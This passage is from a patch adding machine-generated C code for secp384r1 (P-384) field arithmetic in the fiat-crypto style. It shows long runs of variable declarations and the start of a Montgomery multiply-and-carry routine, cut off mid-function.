fiat_secp384r1_uint1 x764; ++ uint32_t x765; ++ fiat_secp384r1_uint1 x766; ++ uint32_t x767; ++ fiat_secp384r1_uint1 x768; ++ uint32_t x769; ++ fiat_secp384r1_uint1 x770; ++ uint32_t x771; ++ fiat_secp384r1_uint1 x772; ++ uint32_t x773; ++ fiat_secp384r1_uint1 x774; ++ uint32_t x775; ++ fiat_secp384r1_uint1 x776; ++ uint32_t x777; ++ fiat_secp384r1_uint1 x778; ++ uint32_t x779; ++ fiat_secp384r1_uint1 x780; ++ uint32_t x781; ++ fiat_secp384r1_uint1 x782; ++ uint32_t x783; ++ fiat_secp384r1_uint1 x784; ++ uint32_t x785; ++ fiat_secp384r1_uint1 x786; ++ uint32_t x787; ++ fiat_secp384r1_uint1 x788; ++ uint32_t x789; ++ uint32_t x790; ++ uint32_t x791; ++ uint32_t x792; ++ uint32_t x793; ++ uint32_t x794; ++ uint32_t x795; ++ uint32_t x796; ++ uint32_t x797; ++ uint32_t x798; ++ uint32_t x799; ++ uint32_t x800; ++ uint32_t x801; ++ uint32_t x802; ++ uint32_t x803; ++ uint32_t x804; ++ uint32_t x805; ++ uint32_t x806; ++ uint32_t x807; ++ uint32_t x808; ++ uint32_t x809; ++ fiat_secp384r1_uint1 x810; ++ uint32_t x811; ++ fiat_secp384r1_uint1 x812; ++ uint32_t x813; ++ fiat_secp384r1_uint1 x814; ++ uint32_t x815; ++ fiat_secp384r1_uint1 x816; ++ uint32_t x817; ++ fiat_secp384r1_uint1 x818; ++ uint32_t x819; ++ fiat_secp384r1_uint1 x820; ++ uint32_t x821; ++ fiat_secp384r1_uint1 x822; ++ uint32_t x823; ++ fiat_secp384r1_uint1 x824; ++ uint32_t x825; ++ fiat_secp384r1_uint1 x826; ++ uint32_t x827; ++ fiat_secp384r1_uint1 x828; ++ uint32_t x829; ++ fiat_secp384r1_uint1 x830; ++ uint32_t x831; ++ fiat_secp384r1_uint1 x832; ++ uint32_t x833; ++ fiat_secp384r1_uint1 x834; ++ uint32_t x835; ++ fiat_secp384r1_uint1 x836; ++ uint32_t x837; ++ fiat_secp384r1_uint1 x838; ++ uint32_t x839; ++ fiat_secp384r1_uint1 x840; ++ uint32_t x841; ++ fiat_secp384r1_uint1 x842; ++ uint32_t x843; ++ fiat_secp384r1_uint1 x844; ++ uint32_t x845; ++ fiat_secp384r1_uint1 x846; ++ uint32_t x847; ++ fiat_secp384r1_uint1 x848; ++ uint32_t x849; ++ fiat_secp384r1_uint1 x850; ++ uint32_t x851; ++ uint32_t x852; ++ uint32_t x853; ++ uint32_t x854; ++ uint32_t x855; ++ uint32_t x856; ++ uint32_t x857; ++ uint32_t x858; ++ uint32_t x859; ++ fiat_secp384r1_uint1 x860; ++ uint32_t x861; ++ fiat_secp384r1_uint1 x862; ++ uint32_t x863; ++ fiat_secp384r1_uint1 x864; ++ uint32_t x865; ++ fiat_secp384r1_uint1 x866; ++ uint32_t x867; ++ fiat_secp384r1_uint1 x868; ++ uint32_t x869; ++ fiat_secp384r1_uint1 x870; ++ uint32_t x871; ++ fiat_secp384r1_uint1 x872; ++ uint32_t x873; ++ fiat_secp384r1_uint1 x874; ++ uint32_t x875; ++ fiat_secp384r1_uint1 x876; ++ uint32_t x877; ++ fiat_secp384r1_uint1 x878; ++ uint32_t x879; ++ fiat_secp384r1_uint1 x880; ++ uint32_t x881; ++ fiat_secp384r1_uint1 x882; ++ uint32_t x883; ++ fiat_secp384r1_uint1 x884; ++ uint32_t x885; ++ uint32_t x886; ++ uint32_t x887; ++ uint32_t x888; ++ uint32_t x889; ++ uint32_t x890; ++ uint32_t x891; ++ uint32_t x892; ++ uint32_t x893; ++ uint32_t x894; ++ uint32_t x895; ++ uint32_t x896; ++ uint32_t x897; ++ uint32_t x898; ++ uint32_t x899; ++ uint32_t x900; ++ uint32_t x901; ++ uint32_t x902; ++ uint32_t x903; ++ uint32_t x904; ++ uint32_t x905; ++ fiat_secp384r1_uint1 x906; ++ uint32_t x907; ++ fiat_secp384r1_uint1 x908; ++ uint32_t x909; ++ fiat_secp384r1_uint1 x910; ++ uint32_t x911; ++ fiat_secp384r1_uint1 x912; ++ uint32_t x913; ++ fiat_secp384r1_uint1 x914; ++ uint32_t x915; ++ fiat_secp384r1_uint1 x916; ++ uint32_t x917; ++ fiat_secp384r1_uint1 x918; ++ uint32_t x919; ++ fiat_secp384r1_uint1 x920; ++ uint32_t x921; ++ fiat_secp384r1_uint1 x922; ++ uint32_t x923; ++ fiat_secp384r1_uint1 x924; ++ uint32_t x925; ++ fiat_secp384r1_uint1 x926; ++ uint32_t x927; ++ fiat_secp384r1_uint1 x928; ++ uint32_t x929; ++ fiat_secp384r1_uint1 x930; ++ uint32_t x931; ++ fiat_secp384r1_uint1 x932; ++ uint32_t x933; ++ fiat_secp384r1_uint1 x934; ++ uint32_t x935; ++ fiat_secp384r1_uint1 x936; ++ uint32_t x937; ++ fiat_secp384r1_uint1 x938; ++ uint32_t x939; ++ fiat_secp384r1_uint1 x940; ++ uint32_t x941; ++ fiat_secp384r1_uint1 x942; ++ uint32_t x943; ++ fiat_secp384r1_uint1 x944; ++ uint32_t x945; ++ fiat_secp384r1_uint1 x946; ++ uint32_t x947; ++ uint32_t x948; ++ uint32_t x949; ++ uint32_t x950; ++ uint32_t x951; ++ uint32_t x952; ++ uint32_t x953; ++ uint32_t x954; ++ uint32_t x955; ++ fiat_secp384r1_uint1 x956; ++ uint32_t x957; ++ fiat_secp384r1_uint1 x958; ++ uint32_t x959; ++ fiat_secp384r1_uint1 x960; ++ uint32_t x961; ++ fiat_secp384r1_uint1 x962; ++ uint32_t x963; ++ fiat_secp384r1_uint1 x964; ++ uint32_t x965; ++ fiat_secp384r1_uint1 x966; ++ uint32_t x967; ++ fiat_secp384r1_uint1 x968; ++ uint32_t x969; ++ fiat_secp384r1_uint1 x970; ++ uint32_t x971; ++ fiat_secp384r1_uint1 x972; ++ uint32_t x973; ++ fiat_secp384r1_uint1 x974; ++ uint32_t x975; ++ fiat_secp384r1_uint1 x976; ++ uint32_t x977; ++ fiat_secp384r1_uint1 x978; ++ uint32_t x979; ++ fiat_secp384r1_uint1 x980; ++ uint32_t x981; ++ uint32_t x982; ++ uint32_t x983; ++ uint32_t x984; ++ uint32_t x985; ++ uint32_t x986; ++ uint32_t x987; ++ uint32_t x988; ++ uint32_t x989; ++ uint32_t x990; ++ uint32_t x991; ++ uint32_t x992; ++ uint32_t x993; ++ uint32_t x994; ++ uint32_t x995; ++ uint32_t x996; ++ uint32_t x997; ++ uint32_t x998; ++ uint32_t x999; ++ uint32_t x1000; ++ uint32_t x1001; ++ fiat_secp384r1_uint1 x1002; ++ uint32_t x1003; ++ fiat_secp384r1_uint1 x1004; ++ uint32_t x1005; ++ fiat_secp384r1_uint1 x1006; ++ uint32_t x1007; ++ fiat_secp384r1_uint1 x1008; ++ uint32_t x1009; ++ fiat_secp384r1_uint1 x1010; ++ uint32_t x1011; ++ fiat_secp384r1_uint1 x1012; ++ uint32_t x1013; ++ fiat_secp384r1_uint1 x1014; ++ uint32_t x1015; ++ fiat_secp384r1_uint1 x1016; ++ uint32_t x1017; ++ fiat_secp384r1_uint1 x1018; ++ uint32_t x1019; ++ fiat_secp384r1_uint1 x1020; ++ uint32_t x1021; ++ fiat_secp384r1_uint1 x1022; ++ uint32_t x1023; ++ fiat_secp384r1_uint1 x1024; ++ uint32_t x1025; ++ fiat_secp384r1_uint1 x1026; ++ uint32_t x1027; ++ fiat_secp384r1_uint1 x1028; ++ uint32_t x1029; ++ fiat_secp384r1_uint1 x1030; ++ uint32_t x1031; ++ fiat_secp384r1_uint1 x1032; ++ uint32_t x1033; ++ fiat_secp384r1_uint1 x1034; ++ uint32_t x1035; ++ fiat_secp384r1_uint1 x1036; ++ uint32_t x1037; ++ fiat_secp384r1_uint1 x1038; ++ uint32_t x1039; ++ fiat_secp384r1_uint1 x1040; ++ uint32_t x1041; ++ fiat_secp384r1_uint1 x1042; ++ uint32_t x1043; ++ uint32_t x1044; ++ uint32_t x1045; ++ uint32_t x1046; ++ uint32_t x1047; ++ uint32_t x1048; ++ uint32_t x1049; ++ uint32_t x1050; ++ uint32_t x1051; ++ fiat_secp384r1_uint1 x1052; ++ uint32_t x1053; ++ fiat_secp384r1_uint1 x1054; ++ uint32_t x1055; ++ fiat_secp384r1_uint1 x1056; ++ uint32_t x1057; ++ fiat_secp384r1_uint1 x1058; ++ uint32_t x1059; ++ fiat_secp384r1_uint1 x1060; ++ uint32_t x1061; ++ fiat_secp384r1_uint1 x1062; ++ uint32_t x1063; ++ fiat_secp384r1_uint1 x1064; ++ uint32_t x1065; ++ fiat_secp384r1_uint1 x1066; ++ uint32_t x1067; ++ fiat_secp384r1_uint1 x1068; ++ uint32_t x1069; ++ fiat_secp384r1_uint1 x1070; ++ uint32_t x1071; ++ fiat_secp384r1_uint1 x1072; ++ uint32_t x1073; ++ fiat_secp384r1_uint1 x1074; ++ uint32_t x1075; ++ fiat_secp384r1_uint1 x1076; ++ uint32_t x1077; ++ uint32_t x1078; ++ uint32_t x1079; ++ uint32_t x1080; ++ uint32_t x1081; ++ uint32_t x1082; ++ uint32_t x1083; ++ uint32_t x1084; ++ uint32_t x1085; ++ uint32_t x1086; ++ uint32_t x1087; ++ uint32_t x1088; ++ uint32_t x1089; ++ uint32_t x1090; ++ uint32_t x1091; ++ uint32_t x1092; ++ uint32_t x1093; ++ uint32_t x1094; ++ uint32_t x1095; ++ uint32_t x1096; ++ uint32_t x1097; ++ fiat_secp384r1_uint1 x1098; ++ uint32_t x1099; ++ fiat_secp384r1_uint1 x1100; ++ uint32_t x1101; ++ fiat_secp384r1_uint1 x1102; ++ uint32_t x1103; ++ fiat_secp384r1_uint1 x1104; ++ uint32_t x1105; ++ fiat_secp384r1_uint1 x1106; ++ uint32_t x1107; ++ fiat_secp384r1_uint1 x1108; ++ uint32_t x1109; ++ fiat_secp384r1_uint1 x1110; ++ uint32_t x1111; ++ fiat_secp384r1_uint1 x1112; ++ uint32_t x1113; ++ fiat_secp384r1_uint1 x1114; ++ uint32_t x1115; ++ fiat_secp384r1_uint1 x1116; ++ uint32_t x1117; ++ fiat_secp384r1_uint1 x1118; ++ uint32_t x1119; ++ fiat_secp384r1_uint1 x1120; ++ uint32_t x1121; ++ fiat_secp384r1_uint1 x1122; ++ uint32_t x1123; ++ fiat_secp384r1_uint1 x1124; ++ uint32_t x1125; ++ fiat_secp384r1_uint1 x1126; ++ uint32_t x1127; ++ fiat_secp384r1_uint1 x1128; ++ uint32_t x1129; ++ fiat_secp384r1_uint1 x1130; ++ uint32_t x1131; ++ fiat_secp384r1_uint1 x1132; ++ uint32_t x1133; ++ fiat_secp384r1_uint1 x1134; ++ uint32_t x1135; ++ fiat_secp384r1_uint1 x1136; ++ uint32_t x1137; ++ fiat_secp384r1_uint1 x1138; ++ uint32_t x1139; ++ fiat_secp384r1_uint1 x1140; ++ uint32_t x1141; ++ fiat_secp384r1_uint1 x1142; ++ uint32_t x1143; ++ fiat_secp384r1_uint1 x1144; ++ uint32_t x1145; ++ fiat_secp384r1_uint1 x1146; ++ uint32_t x1147; ++ fiat_secp384r1_uint1 x1148; ++ uint32_t x1149; ++ fiat_secp384r1_uint1 x1150; ++ uint32_t x1151; ++ fiat_secp384r1_uint1 x1152; ++ uint32_t x1153; ++ fiat_secp384r1_uint1 x1154; ++ uint32_t x1155; ++ fiat_secp384r1_uint1 x1156; ++ uint32_t x1157; ++ fiat_secp384r1_uint1 x1158; ++ uint32_t x1159; ++ fiat_secp384r1_uint1 x1160; ++ uint32_t x1161; ++ fiat_secp384r1_uint1 x1162; ++ uint32_t x1163; ++ fiat_secp384r1_uint1 x1164; ++ uint32_t x1165; ++ uint32_t x1166; ++ uint32_t x1167; ++ uint32_t x1168; ++ uint32_t x1169; ++ uint32_t x1170; ++ uint32_t x1171; ++ uint32_t x1172; ++ uint32_t x1173; ++ uint32_t x1174; ++ uint32_t x1175; ++ uint32_t x1176; ++ x1 = (arg1[1]); ++ x2 = (arg1[2]); ++ x3 = (arg1[3]); ++ x4 = (arg1[4]); ++ x5 = (arg1[5]); ++ x6 = (arg1[6]); ++ x7 = (arg1[7]); ++ x8 = (arg1[8]); ++ x9 = (arg1[9]); ++ x10 = (arg1[10]); ++ x11 = (arg1[11]); ++ x12 = (arg1[0]); ++ fiat_secp384r1_mulx_u32(&x13, &x14, x12, 0x2); ++ fiat_secp384r1_mulx_u32(&x15, &x16, x12, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x17, &x18, x12, 0x2); ++ fiat_secp384r1_mulx_u32(&x19, &x20, x12, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x21, &x22, 0x0, (fiat_secp384r1_uint1)x14, ++ x12); ++ fiat_secp384r1_mulx_u32(&x23, &x24, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x25, &x26, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x27, &x28, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x29, &x30, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x31, &x32, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x33, &x34, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x35, &x36, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x37, &x38, x12, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x39, &x40, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x41, &x42, x12, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x43, &x44, 0x0, x40, x37); ++ fiat_secp384r1_addcarryx_u32(&x45, &x46, x44, x38, x35); ++ fiat_secp384r1_addcarryx_u32(&x47, &x48, x46, x36, x33); ++ fiat_secp384r1_addcarryx_u32(&x49, &x50, x48, x34, x31); ++ fiat_secp384r1_addcarryx_u32(&x51, &x52, x50, x32, x29); ++ fiat_secp384r1_addcarryx_u32(&x53, &x54, x52, x30, x27); ++ fiat_secp384r1_addcarryx_u32(&x55, &x56, x54, x28, x25); ++ fiat_secp384r1_addcarryx_u32(&x57, &x58, x56, x26, x23); ++ fiat_secp384r1_addcarryx_u32(&x59, &x60, 0x0, x12, x41); ++ fiat_secp384r1_addcarryx_u32(&x61, &x62, x60, x19, x42); ++ fiat_secp384r1_addcarryx_u32(&x63, &x64, 0x0, x17, x39); ++ fiat_secp384r1_addcarryx_u32(&x65, &x66, x64, (fiat_secp384r1_uint1)x18, ++ x43); ++ fiat_secp384r1_addcarryx_u32(&x67, &x68, x66, x15, x45); ++ fiat_secp384r1_addcarryx_u32(&x69, &x70, x68, x16, x47); ++ fiat_secp384r1_addcarryx_u32(&x71, &x72, x70, x13, x49); ++ fiat_secp384r1_addcarryx_u32(&x73, &x74, x72, x21, x51); ++ fiat_secp384r1_addcarryx_u32(&x75, &x76, x74, x22, x53); ++ fiat_secp384r1_addcarryx_u32(&x77, &x78, x76, 0x0, x55); ++ fiat_secp384r1_addcarryx_u32(&x79, &x80, x78, 0x0, x57); ++ fiat_secp384r1_addcarryx_u32(&x81, &x82, x80, 0x0, (x58 + x24)); ++ fiat_secp384r1_mulx_u32(&x83, &x84, x1, 0x2); ++ fiat_secp384r1_mulx_u32(&x85, &x86, x1, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x87, &x88, x1, 0x2); ++ fiat_secp384r1_mulx_u32(&x89, &x90, x1, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x91, &x92, 0x0, (fiat_secp384r1_uint1)x84, ++ x1); ++ fiat_secp384r1_addcarryx_u32(&x93, &x94, 0x0, x61, x1); ++ fiat_secp384r1_addcarryx_u32(&x95, &x96, x94, (x62 + x20), x89); ++ fiat_secp384r1_addcarryx_u32(&x97, &x98, x96, x63, x90); ++ fiat_secp384r1_addcarryx_u32(&x99, &x100, x98, x65, x87); ++ fiat_secp384r1_addcarryx_u32(&x101, &x102, x100, x67, ++ (fiat_secp384r1_uint1)x88); ++ fiat_secp384r1_addcarryx_u32(&x103, &x104, x102, x69, x85); ++ fiat_secp384r1_addcarryx_u32(&x105, &x106, x104, x71, x86); ++ fiat_secp384r1_addcarryx_u32(&x107, &x108, x106, x73, x83); ++ fiat_secp384r1_addcarryx_u32(&x109, &x110, x108, x75, x91); ++ fiat_secp384r1_addcarryx_u32(&x111, &x112, x110, x77, x92); ++ fiat_secp384r1_addcarryx_u32(&x113, &x114, x112, x79, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x115, &x116, x114, x81, 0x0); ++ fiat_secp384r1_mulx_u32(&x117, &x118, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x119, &x120, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x121, &x122, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x123, &x124, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x125, &x126, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x127, &x128, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x129, &x130, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x131, &x132, x93, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x133, &x134, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x135, &x136, x93, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x137, &x138, 0x0, x134, x131); ++ fiat_secp384r1_addcarryx_u32(&x139, &x140, x138, x132, x129); ++ fiat_secp384r1_addcarryx_u32(&x141, &x142, x140, x130, x127); ++ fiat_secp384r1_addcarryx_u32(&x143, &x144, x142, x128, x125); ++ fiat_secp384r1_addcarryx_u32(&x145, &x146, x144, x126, x123); ++ fiat_secp384r1_addcarryx_u32(&x147, &x148, x146, x124, x121); ++ fiat_secp384r1_addcarryx_u32(&x149, &x150, x148, x122, x119); ++ fiat_secp384r1_addcarryx_u32(&x151, &x152, x150, x120, x117); ++ fiat_secp384r1_addcarryx_u32(&x153, &x154, 0x0, x93, x135); ++ fiat_secp384r1_addcarryx_u32(&x155, &x156, x154, x95, x136); ++ fiat_secp384r1_addcarryx_u32(&x157, &x158, x156, x97, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x159, &x160, x158, x99, x133); ++ fiat_secp384r1_addcarryx_u32(&x161, &x162, x160, x101, x137); ++ fiat_secp384r1_addcarryx_u32(&x163, &x164, x162, x103, x139); ++ fiat_secp384r1_addcarryx_u32(&x165, &x166, x164, x105, x141); ++ fiat_secp384r1_addcarryx_u32(&x167, &x168, x166, x107, x143); ++ fiat_secp384r1_addcarryx_u32(&x169, &x170, x168, x109, x145); ++ fiat_secp384r1_addcarryx_u32(&x171, &x172, x170, x111, x147); ++ fiat_secp384r1_addcarryx_u32(&x173, &x174, x172, x113, x149); ++ fiat_secp384r1_addcarryx_u32(&x175, &x176, x174, x115, x151); ++ fiat_secp384r1_addcarryx_u32(&x177, &x178, x176, ((uint32_t)x116 + x82), ++ (x152 + x118)); ++ fiat_secp384r1_mulx_u32(&x179, &x180, x2, 0x2); ++ fiat_secp384r1_mulx_u32(&x181, &x182, x2, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x183, &x184, x2, 0x2); ++ fiat_secp384r1_mulx_u32(&x185, &x186, x2, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x187, &x188, 0x0, (fiat_secp384r1_uint1)x180, ++ x2); ++ fiat_secp384r1_addcarryx_u32(&x189, &x190, 0x0, x155, x2); ++ fiat_secp384r1_addcarryx_u32(&x191, &x192, x190, x157, x185); ++ fiat_secp384r1_addcarryx_u32(&x193, &x194, x192, x159, x186); ++ fiat_secp384r1_addcarryx_u32(&x195, &x196, x194, x161, x183); ++ fiat_secp384r1_addcarryx_u32(&x197, &x198, x196, x163, ++ (fiat_secp384r1_uint1)x184); ++ fiat_secp384r1_addcarryx_u32(&x199, &x200, x198, x165, x181); ++ fiat_secp384r1_addcarryx_u32(&x201, &x202, x200, x167, x182); ++ fiat_secp384r1_addcarryx_u32(&x203, &x204, x202, x169, x179); ++ fiat_secp384r1_addcarryx_u32(&x205, &x206, x204, x171, x187); ++ fiat_secp384r1_addcarryx_u32(&x207, &x208, x206, x173, x188); ++ fiat_secp384r1_addcarryx_u32(&x209, &x210, x208, x175, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x211, &x212, x210, x177, 0x0); ++ fiat_secp384r1_mulx_u32(&x213, &x214, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x215, &x216, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x217, &x218, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x219, &x220, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x221, &x222, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x223, &x224, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x225, &x226, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x227, &x228, x189, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x229, &x230, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x231, &x232, x189, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x233, &x234, 0x0, x230, x227); ++ fiat_secp384r1_addcarryx_u32(&x235, &x236, x234, x228, x225); ++ fiat_secp384r1_addcarryx_u32(&x237, &x238, x236, x226, x223); ++ fiat_secp384r1_addcarryx_u32(&x239, &x240, x238, x224, x221); ++ fiat_secp384r1_addcarryx_u32(&x241, &x242, x240, x222, x219); ++ fiat_secp384r1_addcarryx_u32(&x243, &x244, x242, x220, x217); ++ fiat_secp384r1_addcarryx_u32(&x245, &x246, x244, x218, x215); ++ fiat_secp384r1_addcarryx_u32(&x247, &x248, x246, x216, x213); ++ fiat_secp384r1_addcarryx_u32(&x249, &x250, 0x0, x189, x231); ++ fiat_secp384r1_addcarryx_u32(&x251, &x252, x250, x191, x232); ++ fiat_secp384r1_addcarryx_u32(&x253, &x254, x252, x193, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x255, &x256, x254, x195, x229); ++ fiat_secp384r1_addcarryx_u32(&x257, &x258, x256, x197, x233); ++ fiat_secp384r1_addcarryx_u32(&x259, &x260, x258, x199, x235); ++ fiat_secp384r1_addcarryx_u32(&x261, &x262, x260, x201, x237); ++ fiat_secp384r1_addcarryx_u32(&x263, &x264, x262, x203, x239); ++ fiat_secp384r1_addcarryx_u32(&x265, &x266, x264, x205, x241); ++ fiat_secp384r1_addcarryx_u32(&x267, &x268, x266, x207, x243); ++ fiat_secp384r1_addcarryx_u32(&x269, &x270, x268, x209, x245); ++ fiat_secp384r1_addcarryx_u32(&x271, &x272, x270, x211, x247); ++ fiat_secp384r1_addcarryx_u32(&x273, &x274, x272, ((uint32_t)x212 + x178), ++ (x248 + x214)); ++ fiat_secp384r1_mulx_u32(&x275, &x276, x3, 0x2); ++ fiat_secp384r1_mulx_u32(&x277, &x278, x3, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x279, &x280, x3, 0x2); ++ fiat_secp384r1_mulx_u32(&x281, &x282, x3, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x283, &x284, 0x0, (fiat_secp384r1_uint1)x276, ++ x3); ++ fiat_secp384r1_addcarryx_u32(&x285, &x286, 0x0, x251, x3); ++ fiat_secp384r1_addcarryx_u32(&x287, &x288, x286, x253, x281); ++ fiat_secp384r1_addcarryx_u32(&x289, &x290, x288, x255, x282); ++ fiat_secp384r1_addcarryx_u32(&x291, &x292, x290, x257, x279); ++ fiat_secp384r1_addcarryx_u32(&x293, &x294, x292, x259, ++ (fiat_secp384r1_uint1)x280); ++ fiat_secp384r1_addcarryx_u32(&x295, &x296, x294, x261, x277); ++ fiat_secp384r1_addcarryx_u32(&x297, &x298, x296, x263, x278); ++ fiat_secp384r1_addcarryx_u32(&x299, &x300, x298, x265, x275); ++ fiat_secp384r1_addcarryx_u32(&x301, &x302, x300, x267, x283); ++ fiat_secp384r1_addcarryx_u32(&x303, &x304, x302, x269, x284); ++ fiat_secp384r1_addcarryx_u32(&x305, &x306, x304, x271, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x307, &x308, x306, x273, 0x0); ++ fiat_secp384r1_mulx_u32(&x309, &x310, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x311, &x312, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x313, &x314, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x315, &x316, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x317, &x318, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x319, &x320, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x321, &x322, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x323, &x324, x285, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x325, &x326, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x327, &x328, x285, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x329, &x330, 0x0, x326, x323); ++ fiat_secp384r1_addcarryx_u32(&x331, &x332, x330, x324, x321); ++ fiat_secp384r1_addcarryx_u32(&x333, &x334, x332, x322, x319); ++ fiat_secp384r1_addcarryx_u32(&x335, &x336, x334, x320, x317); ++ fiat_secp384r1_addcarryx_u32(&x337, &x338, x336, x318, x315); ++ fiat_secp384r1_addcarryx_u32(&x339, &x340, x338, x316, x313); ++ fiat_secp384r1_addcarryx_u32(&x341, &x342, x340, x314, x311); ++ fiat_secp384r1_addcarryx_u32(&x343, &x344, x342, x312, x309); ++ fiat_secp384r1_addcarryx_u32(&x345, &x346, 0x0, x285, x327); ++ fiat_secp384r1_addcarryx_u32(&x347, &x348, x346, x287, x328); ++ fiat_secp384r1_addcarryx_u32(&x349, &x350, x348, x289, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x351, &x352, x350, x291, x325); ++ fiat_secp384r1_addcarryx_u32(&x353, &x354, x352, x293, x329); ++ fiat_secp384r1_addcarryx_u32(&x355, &x356, x354, x295, x331); ++ fiat_secp384r1_addcarryx_u32(&x357, &x358, x356, x297, x333); ++ fiat_secp384r1_addcarryx_u32(&x359, &x360, x358, x299, x335); ++ fiat_secp384r1_addcarryx_u32(&x361, &x362, x360, x301, x337); ++ fiat_secp384r1_addcarryx_u32(&x363, &x364, x362, x303, x339); ++ fiat_secp384r1_addcarryx_u32(&x365, &x366, x364, x305, x341); ++ fiat_secp384r1_addcarryx_u32(&x367, &x368, x366, x307, x343); ++ fiat_secp384r1_addcarryx_u32(&x369, &x370, x368, ((uint32_t)x308 + x274), ++ (x344 + x310)); ++ fiat_secp384r1_mulx_u32(&x371, &x372, x4, 0x2); ++ fiat_secp384r1_mulx_u32(&x373, &x374, x4, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x375, &x376, x4, 0x2); ++ fiat_secp384r1_mulx_u32(&x377, &x378, x4, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x379, &x380, 0x0, (fiat_secp384r1_uint1)x372, ++ x4); ++ fiat_secp384r1_addcarryx_u32(&x381, &x382, 0x0, x347, x4); ++ fiat_secp384r1_addcarryx_u32(&x383, &x384, x382, x349, x377); ++ fiat_secp384r1_addcarryx_u32(&x385, &x386, x384, x351, x378); ++ fiat_secp384r1_addcarryx_u32(&x387, &x388, x386, x353, x375); ++ fiat_secp384r1_addcarryx_u32(&x389, &x390, x388, x355, ++ (fiat_secp384r1_uint1)x376); ++ fiat_secp384r1_addcarryx_u32(&x391, &x392, x390, x357, x373); ++ fiat_secp384r1_addcarryx_u32(&x393, &x394, x392, x359, x374); ++ fiat_secp384r1_addcarryx_u32(&x395, &x396, x394, x361, x371); ++ fiat_secp384r1_addcarryx_u32(&x397, &x398, x396, x363, x379); ++ fiat_secp384r1_addcarryx_u32(&x399, &x400, x398, x365, x380); ++ fiat_secp384r1_addcarryx_u32(&x401, &x402, x400, x367, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x403, &x404, x402, x369, 0x0); ++ fiat_secp384r1_mulx_u32(&x405, &x406, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x407, &x408, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x409, &x410, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x411, &x412, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x413, &x414, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x415, &x416, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x417, &x418, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x419, &x420, x381, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x421, &x422, x381, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x423, &x424, x381, UINT32_C(0xffffffff)); ++ 